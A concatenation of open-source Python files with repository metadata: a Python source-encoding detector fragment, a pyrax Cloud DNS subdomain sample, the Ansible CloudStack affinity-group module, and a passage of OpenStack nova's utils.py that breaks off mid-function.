cookie_re = re.compile(r"coding[:=]\s*([-\w.]+)") # Do this so the detect_encode code we copied will work. readline = iter(source.splitlines(True)).next def _get_normal_name(orig_enc): """Imitates get_normal_name in tokenizer.c.""" # Only care about the first 12 characters. 
enc = orig_enc[:12].lower().replace("_", "-") if re.match(r"^utf-8($|-)", enc): return "utf-8" if re.match(r"^(latin-1|iso-8859-1|iso-latin-1)($|-)", enc): return "iso-8859-1" return orig_enc # From detect_encode(): # It detects the encoding from the presence of a utf-8 bom or an encoding # cookie as specified in pep-0263. If both a bom and a cookie are present, # but disagree, a SyntaxError will be raised. If the encoding cookie is an # invalid charset, raise a SyntaxError. Note that if a utf-8 bom is found, # 'utf-8-sig' is returned. # If no encoding is specified, then the default will be returned. The # default varied with version. if sys.version_info <= (2, 4): default = 'iso-8859-1' else: default = 'ascii' bom_found = False encoding = None def read_or_stop(): """Get the next source line, or ''.""" try: return readline() except StopIteration: return '' def find_cookie(line): """Find an encoding cookie in `line`.""" try: line_string = line.decode('ascii') except UnicodeDecodeError: return None matches = cookie_re.findall(line_string) if not matches: return None encoding = _get_normal_name(matches[0]) try: codec = codecs.lookup(encoding) except LookupError: # This behaviour mimics the Python interpreter raise SyntaxError("unknown encoding: " + encoding) if bom_found: # codecs in 2.3 were raw tuples of functions, assume the best. codec_name = getattr(codec, 'name', encoding) if codec_name != 'utf-8': # This behaviour mimics the Python interpreter raise SyntaxError('encoding problem: utf-8') encoding += '-sig' return encoding first = read_or_stop() if first.startswith(codecs.BOM_UTF8): bom_found = True first = first[3:] default = 'utf-8-sig' if not first: return default encoding = find_cookie(first) if encoding: return encoding second = read_or_stop() if not second: return default encoding = find_cookie(second) if encoding: return encoding return default
apache-2.0
pratikmallya/pyrax
samples/cloud_dns/create_subdomain.py
13
1924
#!/usr/bin/env python # -*- coding: utf-8 -*- # Copyright (c)2012 Rackspace US, Inc. # All Rights Reserved. # # Licensed under the Apache License, Version 2.0 (the "License"); you may # not use this file except in compliance with the License. You may obtain # a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, WITHOUT # WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the # License for the specific language governing permissions and limitations # under the License. from __future__ import print_function import os import sys import six import pyrax import pyrax.exceptions as exc pyrax.set_setting("identity_type", "rackspace") creds_file = os.path.expanduser("~/.rackspace_cloud_credentials") pyrax.set_credential_file(creds_file) dns = pyrax.cloud_dns domain_name = "abc.example.edu" try: dom = dns.find(name=domain_name) except exc.NotFound as e: answer = six.moves.input("The domain '%s' was not found. Do you want to create " "it? [y/n]" % domain_name) if not answer.lower().startswith("y"): sys.exit() try: dom = dns.create(name=domain_name, emailAddress="sample@example.edu", ttl=900, comment="sample domain") except exc.DomainCreationFailed as e: print("Domain creation failed:", e) print() sys.exit() print("Domain created:", dom) print() sub_name = "sub.%s" % domain_name try: sub = dns.create(name=sub_name, emailAddress="sample@example.edu", ttl=900, comment="sample subdomain") except exc.DomainCreationFailed as e: print("Could not create '%s': %s" % (sub_name, e)) print() sys.exit() print("Subdomain '%s' successfully created." % sub_name) print(sub) print()
apache-2.0
halberom/ansible-modules-extras
cloud/cloudstack/cs_affinitygroup.py
33
7824
#!/usr/bin/python # -*- coding: utf-8 -*- # # (c) 2015, René Moser <mail@renemoser.net> # # This file is part of Ansible # # Ansible is free software: you can redistribute it and/or modify # it under the terms of the GNU General Public License as published by # the Free Software Foundation, either version 3 of the License, or # (at your option) any later version. # # Ansible is distributed in the hope that it will be useful, # but WITHOUT ANY WARRANTY; without even the implied warranty of # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the # GNU General Public License for more details. # # You should have received a copy of the GNU General Public License # along with Ansible. If not, see <http://www.gnu.org/licenses/>. DOCUMENTATION = ''' --- module: cs_affinitygroup short_description: Manages affinity groups on Apache CloudStack based clouds. description: - Create and remove affinity groups. version_added: '2.0' author: "René Moser (@resmo)" options: name: description: - Name of the affinity group. required: true affinty_type: description: - Type of the affinity group. If not specified, first found affinity type is used. required: false default: null description: description: - Description of the affinity group. required: false default: null state: description: - State of the affinity group. required: false default: 'present' choices: [ 'present', 'absent' ] domain: description: - Domain the affinity group is related to. required: false default: null account: description: - Account the affinity group is related to. required: false default: null project: description: - Name of the project the affinity group is related to. required: false default: null poll_async: description: - Poll async jobs until job has finished. 
required: false default: true extends_documentation_fragment: cloudstack ''' EXAMPLES = ''' # Create a affinity group - local_action: module: cs_affinitygroup name: haproxy affinty_type: host anti-affinity # Remove a affinity group - local_action: module: cs_affinitygroup name: haproxy state: absent ''' RETURN = ''' --- id: description: UUID of the affinity group. returned: success type: string sample: 87b1e0ce-4e01-11e4-bb66-0050569e64b8 name: description: Name of affinity group. returned: success type: string sample: app description: description: Description of affinity group. returned: success type: string sample: application affinity group affinity_type: description: Type of affinity group. returned: success type: string sample: host anti-affinity project: description: Name of project the affinity group is related to. returned: success type: string sample: Production domain: description: Domain the affinity group is related to. returned: success type: string sample: example domain account: description: Account the affinity group is related to. 
returned: success type: string sample: example account ''' try: from cs import CloudStack, CloudStackException, read_config has_lib_cs = True except ImportError: has_lib_cs = False # import cloudstack common from ansible.module_utils.cloudstack import * class AnsibleCloudStackAffinityGroup(AnsibleCloudStack): def __init__(self, module): super(AnsibleCloudStackAffinityGroup, self).__init__(module) self.returns = { 'type': 'affinity_type', } self.affinity_group = None def get_affinity_group(self): if not self.affinity_group: args = {} args['projectid'] = self.get_project(key='id') args['account'] = self.get_account('name') args['domainid'] = self.get_domain('id') args['name'] = self.module.params.get('name') affinity_groups = self.cs.listAffinityGroups(**args) if affinity_groups: self.affinity_group = affinity_groups['affinitygroup'][0] return self.affinity_group def get_affinity_type(self): affinity_type = self.module.params.get('affinty_type') affinity_types = self.cs.listAffinityGroupTypes() if affinity_types: if not affinity_type: return affinity_types['affinityGroupType'][0]['type'] for a in affinity_types['affinityGroupType']: if a['type'] == affinity_type: return a['type'] self.module.fail_json(msg="affinity group type '%s' not found" % affinity_type) def create_affinity_group(self): affinity_group = self.get_affinity_group() if not affinity_group: self.result['changed'] = True args = {} args['name'] = self.module.params.get('name') args['type'] = self.get_affinity_type() args['description'] = self.module.params.get('description') args['projectid'] = self.get_project(key='id') args['account'] = self.get_account('name') args['domainid'] = self.get_domain('id') if not self.module.check_mode: res = self.cs.createAffinityGroup(**args) if 'errortext' in res: self.module.fail_json(msg="Failed: '%s'" % res['errortext']) poll_async = self.module.params.get('poll_async') if res and poll_async: affinity_group = self._poll_job(res, 'affinitygroup') return affinity_group 
def remove_affinity_group(self): affinity_group = self.get_affinity_group() if affinity_group: self.result['changed'] = True args = {} args['name'] = self.module.params.get('name') args['projectid'] = self.get_project(key='id') args['account'] = self.get_account('name') args['domainid'] = self.get_domain('id') if not self.module.check_mode: res = self.cs.deleteAffinityGroup(**args) if 'errortext' in res: self.module.fail_json(msg="Failed: '%s'" % res['errortext']) poll_async = self.module.params.get('poll_async') if res and poll_async: res = self._poll_job(res, 'affinitygroup') return affinity_group def main(): argument_spec = cs_argument_spec() argument_spec.update(dict( name = dict(required=True), affinty_type = dict(default=None), description = dict(default=None), state = dict(choices=['present', 'absent'], default='present'), domain = dict(default=None), account = dict(default=None), project = dict(default=None), poll_async = dict(type='bool', default=True), )) module = AnsibleModule( argument_spec=argument_spec, required_together=cs_required_together(), supports_check_mode=True ) if not has_lib_cs: module.fail_json(msg="python library cs required: pip install cs") try: acs_ag = AnsibleCloudStackAffinityGroup(module) state = module.params.get('state') if state in ['absent']: affinity_group = acs_ag.remove_affinity_group() else: affinity_group = acs_ag.create_affinity_group() result = acs_ag.get_result(affinity_group) except CloudStackException as e: module.fail_json(msg='CloudStackException: %s' % str(e)) module.exit_json(**result) # import module snippets from ansible.module_utils.basic import * if __name__ == '__main__': main()
gpl-3.0
sacharya/nova
nova/utils.py
1
36217
# vim: tabstop=4 shiftwidth=4 softtabstop=4 # Copyright 2010 United States Government as represented by the # Administrator of the National Aeronautics and Space Administration. # Copyright 2011 Justin Santa Barbara # All Rights Reserved. # # Licensed under the Apache License, Version 2.0 (the "License"); you may # not use this file except in compliance with the License. You may obtain # a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, WITHOUT # WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the # License for the specific language governing permissions and limitations # under the License. """Utilities and helper functions.""" import contextlib import datetime import functools import hashlib import inspect import os import pyclbr import random import re import shutil import socket import struct import sys import tempfile from xml.sax import saxutils import eventlet import netaddr from oslo.config import cfg import six from nova import exception from nova.openstack.common import excutils from nova.openstack.common import gettextutils from nova.openstack.common.gettextutils import _ from nova.openstack.common import importutils from nova.openstack.common import lockutils from nova.openstack.common import log as logging from nova.openstack.common import processutils from nova.openstack.common.rpc import common as rpc_common from nova.openstack.common import timeutils notify_decorator = 'nova.notifications.notify_decorator' monkey_patch_opts = [ cfg.BoolOpt('monkey_patch', default=False, help='Whether to log monkey patching'), cfg.ListOpt('monkey_patch_modules', default=[ 'nova.api.ec2.cloud:%s' % (notify_decorator), 'nova.compute.api:%s' % (notify_decorator) ], help='List of modules/decorators to monkey patch'), ] utils_opts = [ cfg.IntOpt('password_length', default=12, help='Length of 
generated instance admin passwords'), cfg.StrOpt('instance_usage_audit_period', default='month', help='time period to generate instance usages for. ' 'Time period must be hour, day, month or year'), cfg.StrOpt('rootwrap_config', default="/etc/nova/rootwrap.conf", help='Path to the rootwrap configuration file to use for ' 'running commands as root'), cfg.StrOpt('tempdir', help='Explicitly specify the temporary working directory'), ] CONF = cfg.CONF CONF.register_opts(monkey_patch_opts) CONF.register_opts(utils_opts) CONF.import_opt('network_api_class', 'nova.network') LOG = logging.getLogger(__name__) # Used for looking up extensions of text # to their 'multiplied' byte amount BYTE_MULTIPLIERS = { '': 1, 't': 1024 ** 4, 'g': 1024 ** 3, 'm': 1024 ** 2, 'k': 1024, } # used in limits TIME_UNITS = { 'SECOND': 1, 'MINUTE': 60, 'HOUR': 3600, 'DAY': 84400 } _IS_NEUTRON_ATTEMPTED = False _IS_NEUTRON = False synchronized = lockutils.synchronized_with_prefix('nova-') SM_IMAGE_PROP_PREFIX = "image_" SM_INHERITABLE_KEYS = ( 'min_ram', 'min_disk', 'disk_format', 'container_format', ) def vpn_ping(address, port, timeout=0.05, session_id=None): """Sends a vpn negotiation packet and returns the server session. Returns False on a failure. Basic packet structure is below. Client packet (14 bytes):: 0 1 8 9 13 +-+--------+-----+ |x| cli_id |?????| +-+--------+-----+ x = packet identifier 0x38 cli_id = 64 bit identifier ? = unknown, probably flags/padding Server packet (26 bytes):: 0 1 8 9 13 14 21 2225 +-+--------+-----+--------+----+ |x| srv_id |?????| cli_id |????| +-+--------+-----+--------+----+ x = packet identifier 0x40 cli_id = 64 bit identifier ? 
= unknown, probably flags/padding bit 9 was 1 and the rest were 0 in testing """ if session_id is None: session_id = random.randint(0, 0xffffffffffffffff) sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) data = struct.pack('!BQxxxxx', 0x38, session_id) sock.sendto(data, (address, port)) sock.settimeout(timeout) try: received = sock.recv(2048) except socket.timeout: return False finally: sock.close() fmt = '!BQxxxxxQxxxx' if len(received) != struct.calcsize(fmt): LOG.warn(_('Expected to receive %(exp)s bytes, but actually %(act)s') % dict(exp=struct.calcsize(fmt), act=len(received))) return False (identifier, server_sess, client_sess) = struct.unpack(fmt, received) if identifier == 0x40 and client_sess == session_id: return server_sess def _get_root_helper(): return 'sudo nova-rootwrap %s' % CONF.rootwrap_config def execute(*cmd, **kwargs): """Convenience wrapper around oslo's execute() method.""" if 'run_as_root' in kwargs and not 'root_helper' in kwargs: kwargs['root_helper'] = _get_root_helper() return processutils.execute(*cmd, **kwargs) def trycmd(*args, **kwargs): """Convenience wrapper around oslo's trycmd() method.""" if 'run_as_root' in kwargs and not 'root_helper' in kwargs: kwargs['root_helper'] = _get_root_helper() return processutils.trycmd(*args, **kwargs) def novadir(): import nova return os.path.abspath(nova.__file__).split('nova/__init__.py')[0] def generate_uid(topic, size=8): characters = '01234567890abcdefghijklmnopqrstuvwxyz' choices = [random.choice(characters) for _x in xrange(size)] return '%s-%s' % (topic, ''.join(choices)) # Default symbols to use for passwords. Avoids visually confusing characters. 
# ~6 bits per symbol DEFAULT_PASSWORD_SYMBOLS = ('23456789', # Removed: 0,1 'ABCDEFGHJKLMNPQRSTUVWXYZ', # Removed: I, O 'abcdefghijkmnopqrstuvwxyz') # Removed: l # ~5 bits per symbol EASIER_PASSWORD_SYMBOLS = ('23456789', # Removed: 0, 1 'ABCDEFGHJKLMNPQRSTUVWXYZ') # Removed: I, O def last_completed_audit_period(unit=None, before=None): """This method gives you the most recently *completed* audit period. arguments: units: string, one of 'hour', 'day', 'month', 'year' Periods normally begin at the beginning (UTC) of the period unit (So a 'day' period begins at midnight UTC, a 'month' unit on the 1st, a 'year' on Jan, 1) unit string may be appended with an optional offset like so: 'day@18' This will begin the period at 18:00 UTC. 'month@15' starts a monthly period on the 15th, and year@3 begins a yearly one on March 1st. before: Give the audit period most recently completed before <timestamp>. Defaults to now. returns: 2 tuple of datetimes (begin, end) The begin timestamp of this audit period is the same as the end of the previous. 
""" if not unit: unit = CONF.instance_usage_audit_period offset = 0 if '@' in unit: unit, offset = unit.split("@", 1) offset = int(offset) if before is not None: rightnow = before else: rightnow = timeutils.utcnow() if unit not in ('month', 'day', 'year', 'hour'): raise ValueError('Time period must be hour, day, month or year') if unit == 'month': if offset == 0: offset = 1 end = datetime.datetime(day=offset, month=rightnow.month, year=rightnow.year) if end >= rightnow: year = rightnow.year if 1 >= rightnow.month: year -= 1 month = 12 + (rightnow.month - 1) else: month = rightnow.month - 1 end = datetime.datetime(day=offset, month=month, year=year) year = end.year if 1 >= end.month: year -= 1 month = 12 + (end.month - 1) else: month = end.month - 1 begin = datetime.datetime(day=offset, month=month, year=year) elif unit == 'year': if offset == 0: offset = 1 end = datetime.datetime(day=1, month=offset, year=rightnow.year) if end >= rightnow: end = datetime.datetime(day=1, month=offset, year=rightnow.year - 1) begin = datetime.datetime(day=1, month=offset, year=rightnow.year - 2) else: begin = datetime.datetime(day=1, month=offset, year=rightnow.year - 1) elif unit == 'day': end = datetime.datetime(hour=offset, day=rightnow.day, month=rightnow.month, year=rightnow.year) if end >= rightnow: end = end - datetime.timedelta(days=1) begin = end - datetime.timedelta(days=1) elif unit == 'hour': end = rightnow.replace(minute=offset, second=0, microsecond=0) if end >= rightnow: end = end - datetime.timedelta(hours=1) begin = end - datetime.timedelta(hours=1) return (begin, end) def generate_password(length=None, symbolgroups=DEFAULT_PASSWORD_SYMBOLS): """Generate a random password from the supplied symbol groups. At least one symbol from each group will be included. Unpredictable results if length is less than the number of symbol groups. Believed to be reasonably secure (with a reasonable password length!) 
""" if length is None: length = CONF.password_length r = random.SystemRandom() # NOTE(jerdfelt): Some password policies require at least one character # from each group of symbols, so start off with one random character # from each symbol group password = [r.choice(s) for s in symbolgroups] # If length < len(symbolgroups), the leading characters will only # be from the first length groups. Try our best to not be predictable # by shuffling and then truncating. r.shuffle(password) password = password[:length] length -= len(password) # then fill with random characters from all symbol groups symbols = ''.join(symbolgroups) password.extend([r.choice(symbols) for _i in xrange(length)]) # finally shuffle to ensure first x characters aren't from a # predictable group r.shuffle(password) return ''.join(password) def get_my_ipv4_address(): """Run ip route/addr commands to figure out the best ipv4 """ LOCALHOST = '127.0.0.1' try: out = execute('ip', '-f', 'inet', '-o', 'route', 'show') # Find the default route regex_default = ('default\s*via\s*' '(\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3})' '\s*dev\s*(\w*)\s*') default_routes = re.findall(regex_default, out[0]) if not default_routes: return LOCALHOST gateway, iface = default_routes[0] # Find the right subnet for the gateway/interface for # the default route route = ('(\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3})\/(\d{1,2})' '\s*dev\s*(\w*)\s*') for match in re.finditer(route, out[0]): subnet = netaddr.IPNetwork(match.group(1) + "/" + match.group(2)) if (match.group(3) == iface and netaddr.IPAddress(gateway) in subnet): try: return _get_ipv4_address_for_interface(iface) except exception.NovaException: pass except Exception as ex: LOG.error(_("Couldn't get IPv4 : %(ex)s") % {'ex': ex}) return LOCALHOST def _get_ipv4_address_for_interface(iface): """Run ip addr show for an interface and grab its ipv4 addresses """ try: out = execute('ip', '-f', 'inet', '-o', 'addr', 'show', iface) regexp_address = re.compile('inet\s*' 
'(\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3})') address = [m.group(1) for m in regexp_address.finditer(out[0]) if m.group(1) != '127.0.0.1'] if address: return address[0] else: msg = _('IPv4 address is not found.: %s') % out[0] raise exception.NovaException(msg) except Exception as ex: msg = _("Couldn't get IPv4 of %(interface)s" " : %(ex)s") % {'interface': iface, 'ex': ex} LOG.error(msg) raise exception.NovaException(msg) def get_my_linklocal(interface): try: if_str = execute('ip', '-f', 'inet6', '-o', 'addr', 'show', interface) condition = '\s+inet6\s+([0-9a-f:]+)/\d+\s+scope\s+link' links = [re.search(condition, x) for x in if_str[0].split('\n')] address = [w.group(1) for w in links if w is not None] if address[0] is not None: return address[0] else: msg = _('Link Local address is not found.:%s') % if_str raise exception.NovaException(msg) except Exception as ex: msg = _("Couldn't get Link Local IP of %(interface)s" " :%(ex)s") % {'interface': interface, 'ex': ex} raise exception.NovaException(msg) class LazyPluggable(object): """A pluggable backend loaded lazily based on some value.""" def __init__(self, pivot, config_group=None, **backends): self.__backends = backends self.__pivot = pivot self.__backend = None self.__config_group = config_group def __get_backend(self): if not self.__backend: if self.__config_group is None: backend_name = CONF[self.__pivot] else: backend_name = CONF[self.__config_group][self.__pivot] if backend_name not in self.__backends: msg = _('Invalid backend: %s') % backend_name raise exception.NovaException(msg) backend = self.__backends[backend_name] if isinstance(backend, tuple): name = backend[0] fromlist = backend[1] else: name = backend fromlist = backend self.__backend = __import__(name, None, None, fromlist) return self.__backend def __getattr__(self, key): backend = self.__get_backend() return getattr(backend, key) def xhtml_escape(value): """Escapes a string so it is valid within XML or XHTML. 
""" return saxutils.escape(value, {'"': '&quot;', "'": '&apos;'}) def utf8(value): """Try to turn a string into utf-8 if possible. Code is directly from the utf8 function in http://github.com/facebook/tornado/blob/master/tornado/escape.py """ if isinstance(value, unicode): return value.encode('utf-8') elif isinstance(value, gettextutils.Message): return unicode(value).encode('utf-8') assert isinstance(value, str) return value def check_isinstance(obj, cls): """Checks that obj is of type cls, and lets PyLint infer types.""" if isinstance(obj, cls): return obj raise Exception(_('Expected object of type: %s') % (str(cls))) def parse_server_string(server_str): """ Parses the given server_string and returns a list of host and port. If it's not a combination of host part and port, the port element is a null string. If the input is invalid expression, return a null list. """ try: # First of all, exclude pure IPv6 address (w/o port). if netaddr.valid_ipv6(server_str): return (server_str, '') # Next, check if this is IPv6 address with a port number combination. 
if server_str.find("]:") != -1: (address, port) = server_str.replace('[', '', 1).split(']:') return (address, port) # Third, check if this is a combination of an address and a port if server_str.find(':') == -1: return (server_str, '') # This must be a combination of an address and a port (address, port) = server_str.split(':') return (address, port) except Exception: LOG.error(_('Invalid server_string: %s'), server_str) return ('', '') def is_int_like(val): """Check if a value looks like an int.""" try: return str(int(val)) == str(val) except Exception: return False def is_valid_ipv4(address): """Verify that address represents a valid IPv4 address.""" try: return netaddr.valid_ipv4(address) except Exception: return False def is_valid_ipv6(address): try: return netaddr.valid_ipv6(address) except Exception: return False def is_valid_ipv6_cidr(address): try: str(netaddr.IPNetwork(address, version=6).cidr) return True except Exception: return False def get_shortened_ipv6(address): addr = netaddr.IPAddress(address, version=6) return str(addr.ipv6()) def get_shortened_ipv6_cidr(address): net = netaddr.IPNetwork(address, version=6) return str(net.cidr) def is_valid_cidr(address): """Check if address is valid The provided address can be a IPv6 or a IPv4 CIDR address. """ try: # Validate the correct CIDR Address netaddr.IPNetwork(address) except netaddr.core.AddrFormatError: return False except UnboundLocalError: # NOTE(MotoKen): work around bug in netaddr 0.7.5 (see detail in # https://github.com/drkjam/netaddr/issues/2) return False # Prior validation partially verify /xx part # Verify it here ip_segment = address.split('/') if (len(ip_segment) <= 1 or ip_segment[1] == ''): return False return True def get_ip_version(network): """Returns the IP version of a network (IPv4 or IPv6). Raises AddrFormatError if invalid network. 
""" if netaddr.IPNetwork(network).version == 6: return "IPv6" elif netaddr.IPNetwork(network).version == 4: return "IPv4" def monkey_patch(): """If the Flags.monkey_patch set as True, this function patches a decorator for all functions in specified modules. You can set decorators for each modules using CONF.monkey_patch_modules. The format is "Module path:Decorator function". Example: 'nova.api.ec2.cloud:nova.notifications.notify_decorator' Parameters of the decorator is as follows. (See nova.notifications.notify_decorator) name - name of the function function - object of the function """ # If CONF.monkey_patch is not True, this function do nothing. if not CONF.monkey_patch: return # Get list of modules and decorators for module_and_decorator in CONF.monkey_patch_modules: module, decorator_name = module_and_decorator.split(':') # import decorator function decorator = importutils.import_class(decorator_name) __import__(module) # Retrieve module information using pyclbr module_data = pyclbr.readmodule_ex(module) for key in module_data.keys(): # set the decorator for the class methods if isinstance(module_data[key], pyclbr.Class): clz = importutils.import_class("%s.%s" % (module, key)) for method, func in inspect.getmembers(clz, inspect.ismethod): setattr(clz, method, decorator("%s.%s.%s" % (module, key, method), func)) # set the decorator for the function if isinstance(module_data[key], pyclbr.Function): func = importutils.import_class("%s.%s" % (module, key)) setattr(sys.modules[module], key, decorator("%s.%s" % (module, key), func)) def convert_to_list_dict(lst, label): """Convert a value or list into a list of dicts.""" if not lst: return None if not isinstance(lst, list): lst = [lst] return [{label: x} for x in lst] def make_dev_path(dev, partition=None, base='/dev'): """Return a path to a particular device. 
>>> make_dev_path('xvdc') /dev/xvdc >>> make_dev_path('xvdc', 1) /dev/xvdc1 """ path = os.path.join(base, dev) if partition: path += str(partition) return path def sanitize_hostname(hostname): """Return a hostname which conforms to RFC-952 and RFC-1123 specs.""" if isinstance(hostname, unicode): hostname = hostname.encode('latin-1', 'ignore') hostname = re.sub('[ _]', '-', hostname) hostname = re.sub('[^\w.-]+', '', hostname) hostname = hostname.lower() hostname = hostname.strip('.-') return hostname def read_cached_file(filename, cache_info, reload_func=None): """Read from a file if it has been modified. :param cache_info: dictionary to hold opaque cache. :param reload_func: optional function to be called with data when file is reloaded due to a modification. :returns: data from file """ mtime = os.path.getmtime(filename) if not cache_info or mtime != cache_info.get('mtime'): LOG.debug(_("Reloading cached file %s") % filename) with open(filename) as fap: cache_info['data'] = fap.read() cache_info['mtime'] = mtime if reload_func: reload_func(cache_info['data']) return cache_info['data'] @contextlib.contextmanager def temporary_mutation(obj, **kwargs): """Temporarily set the attr on a particular object to a given value then revert when finished. 
One use of this is to temporarily set the read_deleted flag on a context object: with temporary_mutation(context, read_deleted="yes"): do_something_that_needed_deleted_objects() """ def is_dict_like(thing): return hasattr(thing, 'has_key') def get(thing, attr, default): if is_dict_like(thing): return thing.get(attr, default) else: return getattr(thing, attr, default) def set_value(thing, attr, val): if is_dict_like(thing): thing[attr] = val else: setattr(thing, attr, val) def delete(thing, attr): if is_dict_like(thing): del thing[attr] else: delattr(thing, attr) NOT_PRESENT = object() old_values = {} for attr, new_value in kwargs.items(): old_values[attr] = get(obj, attr, NOT_PRESENT) set_value(obj, attr, new_value) try: yield finally: for attr, old_value in old_values.items(): if old_value is NOT_PRESENT: delete(obj, attr) else: set_value(obj, attr, old_value) def generate_mac_address(): """Generate an Ethernet MAC address.""" # NOTE(vish): We would prefer to use 0xfe here to ensure that linux # bridge mac addresses don't change, but it appears to # conflict with libvirt, so we use the next highest octet # that has the unicast and locally administered bits set # properly: 0xfa. # Discussion: https://bugs.launchpad.net/nova/+bug/921838 mac = [0xfa, 0x16, 0x3e, random.randint(0x00, 0xff), random.randint(0x00, 0xff), random.randint(0x00, 0xff)] return ':'.join(map(lambda x: "%02x" % x, mac)) def read_file_as_root(file_path): """Secure helper to read file as root.""" try: out, _err = execute('cat', file_path, run_as_root=True) return out except processutils.ProcessExecutionError: raise exception.FileNotFound(file_path=file_path) @contextlib.contextmanager def temporary_chown(path, owner_uid=None): """Temporarily chown a path. 
:params owner_uid: UID of temporary owner (defaults to current user) """ if owner_uid is None: owner_uid = os.getuid() orig_uid = os.stat(path).st_uid if orig_uid != owner_uid: execute('chown', owner_uid, path, run_as_root=True) try: yield finally: if orig_uid != owner_uid: execute('chown', orig_uid, path, run_as_root=True) @contextlib.contextmanager def tempdir(**kwargs): argdict = kwargs.copy() if 'dir' not in argdict: argdict['dir'] = CONF.tempdir tmpdir = tempfile.mkdtemp(**argdict) try: yield tmpdir finally: try: shutil.rmtree(tmpdir) except OSError as e: LOG.error(_('Could not remove tmpdir: %s'), str(e)) def walk_class_hierarchy(clazz, encountered=None): """Walk class hierarchy, yielding most derived classes first.""" if not encountered: encountered = [] for subclass in clazz.__subclasses__(): if subclass not in encountered: encountered.append(subclass) # drill down to leaves first for subsubclass in walk_class_hierarchy(subclass, encountered): yield subsubclass yield subclass class UndoManager(object): """Provides a mechanism to facilitate rolling back a series of actions when an exception is raised. """ def __init__(self): self.undo_stack = [] def undo_with(self, undo_func): self.undo_stack.append(undo_func) def _rollback(self): for undo_func in reversed(self.undo_stack): undo_func() def rollback_and_reraise(self, msg=None, **kwargs): """Rollback a series of actions then re-raise the exception. .. note:: (sirp) This should only be called within an exception handler. """ with excutils.save_and_reraise_exception(): if msg: LOG.exception(msg, **kwargs) self._rollback() def mkfs(fs, path, label=None, run_as_root=False): """Format a file or block device :param fs: Filesystem type (examples include 'swap', 'ext3', 'ext4' 'btrfs', etc.) :param path: Path to file or block device to format :param label: Volume label to use """ if fs == 'swap': args = ['mkswap'] else: args = ['mkfs', '-t', fs] #add -F to force no interactive execute on non-block device. 
if fs in ('ext3', 'ext4', 'ntfs'): args.extend(['-F']) if label: if fs in ('msdos', 'vfat'): label_opt = '-n' else: label_opt = '-L' args.extend([label_opt, label]) args.append(path) execute(*args, run_as_root=run_as_root) def last_bytes(file_like_object, num): """Return num bytes from the end of the file, and remaining byte count. :param file_like_object: The file to read :param num: The number of bytes to return :returns (data, remaining) """ try: file_like_object.seek(-num, os.SEEK_END) except IOError as e: if e.errno == 22: file_like_object.seek(0, os.SEEK_SET) else: raise remaining = file_like_object.tell() return (file_like_object.read(), remaining) def metadata_to_dict(metadata): result = {} for item in metadata: if not item.get('deleted'): result[item['key']] = item['value'] return result def dict_to_metadata(metadata): result = [] for key, value in metadata.iteritems(): result.append(dict(key=key, value=value)) return result def instance_meta(instance): if isinstance(instance['metadata'], dict): return instance['metadata'] else: return metadata_to_dict(instance['metadata']) def instance_sys_meta(instance): if not instance.get('system_metadata'): return {} if isinstance(instance['system_metadata'], dict): return instance['system_metadata'] else: return metadata_to_dict(instance['system_metadata']) def get_wrapped_function(function): """Get the method at the bottom of a stack of decorators.""" if not hasattr(function, 'func_closure') or not function.func_closure: return function def _get_wrapped_function(function): if not hasattr(function, 'func_closure') or not function.func_closure: return None for closure in function.func_closure: func = closure.cell_contents deeper_func = _get_wrapped_function(func) if deeper_func: return deeper_func elif hasattr(closure.cell_contents, '__call__'): return closure.cell_contents return _get_wrapped_function(function) class ExceptionHelper(object): """Class to wrap another and translate the ClientExceptions raised by its 
function calls to the actual ones. """ def __init__(self, target): self._target = target def __getattr__(self, name): func = getattr(self._target, name) @functools.wraps(func) def wrapper(*args, **kwargs): try: return func(*args, **kwargs) except rpc_common.ClientException as e: raise (e._exc_info[1], None, e._exc_info[2]) return wrapper def check_string_length(value, name, min_length=0, max_length=None): """Check the length of specified string :param value: the value of the string :param name: the name of the string :param min_length: the min_length of the string :param max_length: the max_length of the string """ if not isinstance(value, six.string_types): msg = _("%s is not a string or unicode") % name raise exception.InvalidInput(message=msg) if len(value) < min_length: msg = _("%(name)s has a minimum character requirement of " "%(min_length)s.") % {'name': name, 'min_length': min_length} raise exception.InvalidInput(message=msg) if max_length and len(value) > max_length: msg = _("%(name)s has more than %(max_length)s " "characters.") % {'name': name, 'max_length': max_length} raise exception.InvalidInput(message=msg) def validate_integer(value, name, min_value=None, max_value=None): """Make sure that value is a valid integer, potentially within range.""" try: value = int(str(value)) except (ValueError, UnicodeEncodeError): msg = _('%(value_name)s must be an integer') raise exception.InvalidInput(reason=( msg % {'value_name': name})) if min_value is not None: if value < min_value: msg = _('%(value_name)s must be >= %(min_value)d') raise exception.InvalidInput( reason=(msg % {'value_name': name, 'min_value': min_value})) if max_value is not None: if value > max_value: msg = _('%(value_name)s must be <= %(max_value)d') raise exception.InvalidInput( reason=( msg % {'value_name': name, 'max_value': max_value}) ) return value def spawn_n(func, *args, **kwargs): """Passthrough method for eventlet.spawn_n. 
This utility exists so that it can be stubbed for testing without interfering with the service spawns. """ eventlet.spawn_n(func, *args, **kwargs) def is_none_string(val): """ Check if a string represents a None value. """ if not isinstance(val, six.string_types): return False return val.lower() == 'none' def convert_version_to_int(version): try: if type(version) == str: version = convert_version_to_tuple(version) if type(version) == tuple: return reduce(lambda x, y: (x * 1000) + y, version) except Exception: raise exception.NovaException(message="Hypervisor version invalid.") def convert_version_to_str(version_int): version_numbers = [] factor = 1000 while version_int != 0: version_number = version_int - (version_int // factor * factor) version_numbers.insert(0, str(version_number)) version_int = version_int / factor return reduce(lambda x, y: "%s.%s" % (x, y), version_numbers) def convert_version_to_tuple(version_str): return tuple(int(part) for part in version_str.split('.')) def is_neutron(): global _IS_NEUTRON_ATTEMPTED global _IS_NEUTRON if _IS_NEUTRON_ATTEMPTED: return _IS_NEUTRON try: # compatibility with Folsom/Grizzly configs cls_name = CONF.network_api_class if cls_name == 'nova.network.quantumv2.api.API': cls_name = 